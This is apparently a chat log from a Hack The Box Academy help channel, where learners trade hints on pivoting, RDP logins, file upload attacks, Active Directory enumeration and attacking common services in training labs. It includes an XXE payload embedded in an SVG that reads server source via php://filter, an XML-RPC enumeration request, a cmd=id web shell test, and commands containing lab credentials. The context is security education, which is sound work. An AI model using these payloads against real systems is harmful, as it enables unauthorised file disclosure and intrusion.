I just got access to this machine, to access to the ports listening
I just connect with agent and I add 10.129.142.228 to the route?
If you do an ip a, you should see the CIDR notation for the subnet, it's basically just that. Something along the lines of 10.129.142.0/24 in this case I think
Ligolo is a bit overkill here though, just do some local port forwarding with the -L flag in SSH
I tried to bruteforce SSH with the password using the custom rule provided, however it didnt work for the user ||Kira||
I am having trouble RDPeeing into the windows machine :
https://academy.hackthebox.com/module/22/section/290
What I typed out: xfreerdp /v:10.129.42.188 /u:james.cross /p:Academy_Student! /dynamic-resolution
The password I used was 'Academy_Student!' and it doesn't work
Try logging in on your phone
the bug go away when i make the window smaller and came back when i fullscreen even reload save
it is a machine not a lab
I just want access to the local ports
that's why I'm saying ligolo is overkill
so better use chisel in this case?
If you just need to access single ports on a remote machine, and there isn't a need to pivot further into the network, my go to is to SSH local port forward
I am www-data
I did revshell
ah that makes sense
You could upload a static copy of socat and use that, but yeah, I understand trying to use ligolo or chisel then if you really don't want to use anything else
I was thinking if I could setup the proxy with ligolo
and connecting to it I could have access to the ports
but I did wget and the machine died lol I had to restart it
.
I think you should, and if not, pretty sure ligolo has an option to do some port redirection which is functionally the same as what I was saying
Did you put single quotes around the password?
xfreerdp /v:10.129.42.188 /u:james.cross /p:'Academy_Student!' /dynamic-resolution
The ! by itself usually gets interpreted differently by the shell
I will try it
Oh I see. I will try that?
probably DM at this point, feels like we're clogging up this channel :)
it crashed anyways I will just use chisel
That still didn't work for me
u writing the password wrong
Write it like this : xfreerdp /v:10.129.42.188 /u:james.cross /p:'Academy_Student!' /dynamic-resolution
I can't see the module because I don't have it unlocked so I don't know what the correct password is 🙃
how do I access powershell then from a linux tool
*linux host
check the ports open
but if I remember well when u have to login with rdp they tell 'RDP to IP with user "" and password "" '
I think it's an older module, so things might be different now
he can check the password policy with other tools anyways
This is the Active Directory LDAP module, the whole point is to work with LDAP
The xfreerdp command, as far as I know, is correct. If you are sure you need to use RDP, maybe try something else like Remmina? If that doesn't work, it could be possible that you're just supposed to query LDAP remotely, or maybe even sign in with winrm.
I haven't done this module, nor have I unlocked it, so I can't say for certain how they do or don't want you to do this.
I got it with chisel
hello, did you manage to figure it out?
I tried this and it didn't work. ' /opt/windapsearch/windapsearch.py --dc-ip 10.129.42.188 -d INLANEFREIGHT.LOCAL -u james.cross -p 'Academy_Student!' --custom '(objectClass=domainDNS)' --attrs pwdHistoryLength
'
Anyone have done The Corporate Osint : Cloud Storage Section. I need help for finding the bucket name of AWS that the site use
Hey i'm practicing in the lab assessment in the pivoting module. Once i pivot on the third machine it start to be a bit confusing, and it's hard to keep the wires connected. Could someone give me a hand/advices on how to keep the flow ?
Look at everything. ||Also the source code||
I just want to say that I've been pointlessly stuck on this question for at least an hour, and it's a very bad question from which you learn almost nothing of value. That's it.
@acoustic owl Still on inlanefreight.com ?
on the nibbles challenge i get "sudo: no tty present and no askpass program specified" after modifying the monitor.sh file and running it, why?
You probably need to stabilize your shell, follow the instructions in the section. They walk you through exactly what to do.
Just use find or locate. If you’ve been stuck on it for an hour, it has value in teaching you how to find files on your system.
using Burp, send a POST request to the server on http://serverip:port/xmlrpc.php with below xml content
```xml
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
```
Now create a Wordlist by collecting all the methods returned in the response and make a wordlist
Now use Burp intruder and replace the system.listMethods with the wordlist and start the attack.
The resulting no. of possible method calls to your target is the answer.
@acoustic owl Thanks!!!
hi i'm having some issues with last section of getting started module. I am clicking on the file upload button but its not letting me upload a file
I'm assuming its a file upload vulnerability much like nibbles earlier in the same section
"upload files and/or images" button does nothing
decrypting the password and logging in was not too difficult.
I mean it took a minute for me to realize it was a hash
but I totally get it
but when I don't get is whether or not the fact that the box I'm currently doing is right after nibbles in same section on academy is trying to trick me into thinking its also a file upload issue
because I'm looking at all of these hidden pages and I am starting to question if its purposely leading me towards file uploads when the real issue is something else
can someone help me out here?
hi there is it only possible to buy cubes with credit card and not with paypal ?
Can I find a team were we join in on #710108839063846964 Htb CTFs ….. open for invites 😃
Hydra doesn't update with apt. I went to the github and did the make install but it still doesn't work for smb. Does anyone know how to fix this?
Lowercase 'k'
In case you can use crackmapexec for SMB
Yes
I believe PayPal is an option
But that sounds more like you should ask support on the website rather than discord
thx i did that a few mins ago 🙂
Can anyone help me with the initial foothold for the "Skills Assessment - File Upload Attacks" Module? I see the page html source code and have tried editing out the blacklist function, but I still can't upload anything other than .jpeg, .jpg, or .png. I've been able to get shell.php.jpg to upload, but I can't really do much from there. I've also tried fuzzing the parameters for LFI. When I fuzz for file extensions and file acceptance types, I get the same length code of 2044 for everything, so it is not really useful.
you can use xxe to view sensitive files such as the backend source code
I actually am able to upload arbitrary files now. I realized I needed to use Firefox to edit out the blacklist function. Can you give me a nudge as to how to view the sensitive files once I have uploaded the xxe-infected svg file? Thanks!
you can find the files u uploaded in an uploads directory, but details to that can only be found if u have first obtained the backend source code
I think that is where I am stuck. I used ffuf to find the ||upload.php|| file, but I am not sure how to obtain its source code. I tried using "php://...." in the parameters of the contact page in burp, but that is not working.
it's in the section under Limited File Uploads
Okay, I will read through that again. Thanks! So, am I supposed to upload the SVG file first, then access it to read the back-end source code? If so, how do I know where to look for the file?
the file will be uploaded yes, but you dont need to look for it as the contents of the back-end source code will be presented in the burp response in svg tags
if you do look for the file, you will see that it actually contains the payload u sent
I see. So far, I have not seen any svg tags in my burp responses. Is there a specific way I am supposed to be uploading it?
Here are my steps so far: Make test.svg file with ||<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]>
<svg>&xxe;</svg>|| then, edit out the blacklist function in Firefox, upload the file, catch it in Burp, send it to responder, and look for the response...but I do not see any svg tags in the response
since u found in your initial enumeration that only .jpg .jpeg and .png are allowed, you can try to upload that format but change its contents to the xxe payload. Note that even though u edited the blacklist function in Firefox, but that is only client-side validation, you dont know what they are doing in the backend yet
I think the part where I change the file's contents is what I am stuck on since the requests in the prior exercises had an obvious place to put in additional code (php or xxe code). I am not understanding how I am supposed to change the code with this type of request format. Do I just put the xxe code at the bottom of the request?
try to upload a legitimate .jpg file, intercept with burp, and then edit the request
Thanks, @umbral wigeon ! Should I focus on the parameters or on adding code to the request?
So I need some help
on which module
having trouble with greenshot.
I'm doing a post request on the web request module
but I don't know what flag I'm looking for
do I just need the session cookie?
I thought there was a hotkey to make a selection of what to capture, then it would auto load the editor so that you can add red arrows and etc. I'm having the hardest time. I'm pushing prntscrn, selecting, then right clicking green arrow in the right bottom tray, and clicking capture last region, which opens up the editor but the selection is now in the wrong spot.
Any nudges for Attacking Common services(easy). I'm stuck on trying to upload the CVE exploit. Ended up getting this.
Date:Sun, 30 Jun 2023 01:46:33 GMT
Server: Core FTP HTTP Server
Accept-Ranges: bytes
Connection: Keep-Alive
Content-type: application/octet-stream
Content-length: 5
I seem to have server connection issues
but everything else worked just fine for me until then
why

so do I just have to wait till tomorrow and hope for a better terminal?
I only have one terminal per day

I do plan on getting VIP soon
soooo hopefully I'll have a better experience 
Anyone available to DM with me about Skills Assessment - File Upload Attacks? I've been stuck on it all day. Thanks!
I just saw the green upload button...FML LOL!!! If you don't use the green square with the upwards arrow icon to upload, you won't get the full POST Request...I was using the blue submit button before.
guys and gals got a question related to adding an exploit to msfconsole ... I am on the shells & payload skills assessment and saw the exploit in question on the target machine but when i try to add it ... it does not show in the msf search result ... did the same thing on my own host and it worked fine so need to find out is something missing at my end or is this a tech issue
I couldn’t see it via search but when I manually typed “use exploit/path/to/file/filename” I was able to use it without searching first
interesting
it worked .. thanks for the suggestion. Wonder why this is the case
It probably builds a cache for searching at some point and you have to refresh it if you add something afterwards
Yes
i did do the updatedb and saw the counter go up but the search didnt work however the use with direct path to file worked
Can anyone nudge me on the final part of Skills Assessment - File Upload? I have found the source code, file upload directory, and renaming scheme. I have uploaded a regular jpg file and found it at the website with the new file name. For my file name, I am using ||shell.pht.jpg|| and also ||image/jpg||. I've been trying to add php code to the request, but so far have not gotten ?cmd=id to work. I've tried lots of Magic Bytes so far, including for jpg/jpeg.
Need a bit of clarification on crackmapexec ... I have tried crackmapexec rdp [target IP] -u [username] -p [password] and got false negative but when I try same credentials on xfreerdp /v: [target IP] /u: [username] /p: [password] it goes through ... why did I get false negative and how to overcome this?
Are the creds a local or domain account?
I haven't used the rdp mode on cme much, I wonder if it supports the same thing for SMB like --local-auth.
ooh not sure about that ... i did get the password from crackmap with smb to enumerate shares and i had the username and found the password
however i just tried to add --local-auth to crackmap for rdp and still got the false negative
if id works than the other simple commands should work ... did you try url encoding
You get a hit [+] using smb mode right? if you did get that hit without --local-auth then it's a domain account otherwise it's a local account.
I've had problems with rdp mode in the past too, part reason why I stopped using it.
whats your alternative ?
yes
Hi everyone, i am new to htb and i am currently doing the get started module, i encounter an issue with msf. i try to exploit a vulnerability on the openssh service but i am asked to configure the 'session' parameter however it seems i have no active session. i am using the VM provided by htb.
does anyone have a clue to help me solve this pb?
that exploit is definitely not the correct path forward
session refers to shells caught with metasploit already using other exploits or means. Because the exploit you selected is for a windows local privilege escalation, so it routes through an existing shell on the victim to run.
thanks @thorn urchin when i search exploit openssh it is the only one proposed though 😥
been awhile since Ive done the module, does it insist on an openssh vuln?
openssh has not had many remote exploits
it said to scan the services on open ports and for the target ip i was given i only had openssh on port 22. i am real beginner so i probably misunderstood something though.
ah in this case youre given a public docker instance
so that port corresponds with the service they want you to poke at
good thing you didnt exploit that ssh server!
the target is written as
HOST_IP:PORT
I just clear the checks with xfreerdp or hydra if I have multiple credentials to check.
😅 oups. but i dont get it, the part where they say 'Target: 83.136.252.24:40135' this is not my target? where can i find the correct IP:PORT then?
then i dont understand where is the problem with the nmap on that target that returns the result above ...
maybe i need to dig deeper in the subject before starting those exercises. thanks for trying to explain me though
you scanned the IP for other ports on the system. So the openssh was for port 22, when youre supposed to poke port 40135
hello
😵 ahhhhhh okayyyyy
i want help guys
thank you very much i thought nmap with the ip scanned allports i did not know it was other ports, thanks for your help and patience!!
when i use airodump ng not showing networks
plz help
theres no airodump module
what
no i am talking about kali linux
where is channel for that
If ya read em, yad know
this has nothing to do with being rude.
This channel is solely about the modules in the HTB Academy.
Kali Linux has its own Discord channel.
good morning friends, i am at AD Enumeration & Attacks - Skills Assessment Part II trying to get flag at SQL01, i have an empty sql database and the service have no access to the admin desktop, one of the 2 users we had to compromise is part of IT-MANAGERS group that has no privileges, SQL01 is vulnerable to printnightmare but cant do it because i need to have credentials, i am stuck for a day and would appreciate a hint
dont give up so quickly on the SQL, review module details closely, even review earlier modules in the course related
i tried Execute Commands, Read Local Files, Capture Service Hash, Impersonate Existing Users with the sql and didnt work, i will try more, thanks 😊
you can just use the information shown in the dehashed output
tf? Sorry I'm not that good with short words 😅
I'm a little confused as to what it's asking
is it asking for the targets banner or the host banner?
I'm assuming the targets banner
but then
why is this answer wrong?
It's in similar nature to this

because you didn't netcat to the correct port.
module : Attacking Common Services - Hard
i found the creds of 2 users ||patric|| (having user priv) and ||julio|| (having admin priv) by impersonating ||john||. but I don't know what to do now
i tried impersonating ||simon|| with ||fiona||
i tried this credentials all over the places
also can't enable xp_cmdshell with ||julio|| or ||patric|| or even ||john||
hi, im stuck in footprinting pop3/imap What is the customized version of the POP3 server? i look to the existing forum and questions/answers but i still dont get it ... i got all the other but still stuck on this one
i know is not the nmap, i got the v9..... and i try it but no luck
connect being the keyword here
You're taught how to connect in the module
Sometimes Nmap doesn't give us all info
If you answer the question which user can you impersonate to get high priv you will understand how to solve it
Where did you get this which services.?
You are on right path but you are missing something
Hey guys it's possible to do multiple pivoting using the same tool like ligolo? I'm trying to do it in the pivoting assessment but it's giving me error. I've added routes and everything, but maybe it's not just possible and i'm losing time
I've reached the pivotwin10 machine (with user vfrank) and the next step would be take the domain controller. But when i try to run the agent the proxy pops errors
Hey guys, Currently doing the whois module in academy. It appears that the whois info for tesla required for an answer is now hidden
Can anyone else confirm
What is the admin email contact for the tesla.com domain (also in-scope for the Tesla bug bounty program)?
I've redone this one and it is not hidden unless it was like very very recent
For some reason it's going through registrador.es for registrar
tried outside of command line and getting similar
It was
Legend
It do be that way
It be like that sometimes
As soon as I clicked on it
Same brainwaves
Hey guys, I'm on Password Attacks Lab - Hard. I've got d**** pass but i can't seem to rdp with it. What am I missing?
I'm currently taking the Linux Fundamentals module and it's asking for the path to the htb-student's mail, so I type 'mail' and it says to install it but I couldn't do that because I don't know the administrator password in the instance. Am I going too deep in trying to hack the instance for root's password to install mail just to get the path or is the answer much simpler than that?
its much simpler, work with the "env" command
Thanks! 👍
I think I have the flag now from txt details for Attacking Common Services Attacking DNS. The module is not acceptting it. format is "HTB(......)" I put with and without "'s, neither works. Anyone that can correct me?
i try solve this
Should be curly braces instead of parentheses, no quotes around the outside
If you’ve found the flag, you should be able to copy and paste it as is
Is it possible it is not the flag? I literally see the format at what i'm looking at right now, but not working.
Have you tried resetting machine?
DM me a screenshot, not at my computer to verify character by character, but I think i can still help
hello all
AD Enumeration & Attacks - Skills Assessment Part II
- 1 Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?
regarding the sub-domain you discovered, is it only two letters?
i know that i have to check bloodhound since it is for checking rights of users
but when am running sharphound at MS01 as administrator user am facing errors
and when i ran sharphound on attacker machine am not able to see any users or don't know how
running it on different machines can help. try on a different victim machine
any hints on how to find users that have genericall and are part of domain admins group ..... am terrible at bloodhound
sent. thank you for looking when you get a chance.
@cunning prairie So I'm supposed to be able to rdp into it? I've currently got a powershell for D**** running but I'm finding nothing LaZagne turns up nothing and I can't lsass dump or sam since I'm not admin
????????
I didn't use RDP (hint).
Look at another protocol.
can i find the answer via pre-built queries or do i have to use custom cipher query
I would try sharphound on a different machine. look at other machines you have accessed.
it do not solve this

